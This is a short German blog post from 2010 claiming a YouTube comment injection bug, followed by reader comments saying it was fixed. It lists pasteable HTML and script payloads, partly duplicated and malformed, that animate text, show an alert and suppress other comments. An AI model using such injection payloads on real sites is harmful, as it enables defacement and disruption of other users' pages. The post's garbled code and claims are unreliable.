Soeben, habe ich einen hochbrisanten Youtube Bug gefunden. Es handelt sich dabei um ein Exploit, welches es ermöglicht, mittels Javascript, HTML Tags, in Kommentare einzubauen. Somit kann man beispielsweise, <marquee> Tag einbauen, welches den Text, animiert. Ausserdem kann man die Schriftgröße mittels <h1> festlegen. Als wäre das nicht schon krass, werden, alle anderen Kommentare darunter nicht mehr angezeigt, und die Kommentar funktion ist deaktiviert.
Der Code um dies zu tuen ist:
Normal:
<script>IF_HTML_FUNCTION?<h1><marquee><font color=”red”><u>*enter your comment here*<script>
Kürzer:
<script><h1><marquee><font color=”red”><u>*enter your comment here*<script>
Schriftgröße:
<script><h1><marquee><font size=” “><u>comment<script>
Warnmeldung:
<script><BODY onLoad=”alert(‘INSERT COMMENT HERE”‘);”
Seitenfehler::
<script>IF_HTML_FUNCTION?<xmp><script>
<script>IF_HTML_FUNCTION?<h1><marquee><font color=”red”><u>*enter your comment here*<script>
Kürzer:
<script><h1><marquee><font color=”red”><u>*enter your comment here*<script>
Schriftgröße:
<script><h1><marquee><font size=” “><u>comment<script>
Warnmeldung:
<script><BODY onLoad=”alert(‘INSERT COMMENT HERE”‘);”
Seitenfehler::
<script>IF_HTML_FUNCTION?<xmp><script>
Es handelt sich dabei wirklich um einen grosses Problem, um das sich Youtube wahrscheinlich bereits jetzt kümmern wird.
Gefunden habe ich es zum ersten Mal hier:
http://www.youtube.com/watch?v=ukW04nnjFmo
GD Star Rating
loading…
loading…
denk dir was aus says:
4. Juli 2010 at 13:59youtube hat des schon gefixt..
Max says:
4. Juli 2010 at 15:10Jo hast recht
Viet says:
27. Juli 2010 at 12:24Das ging ja schnell.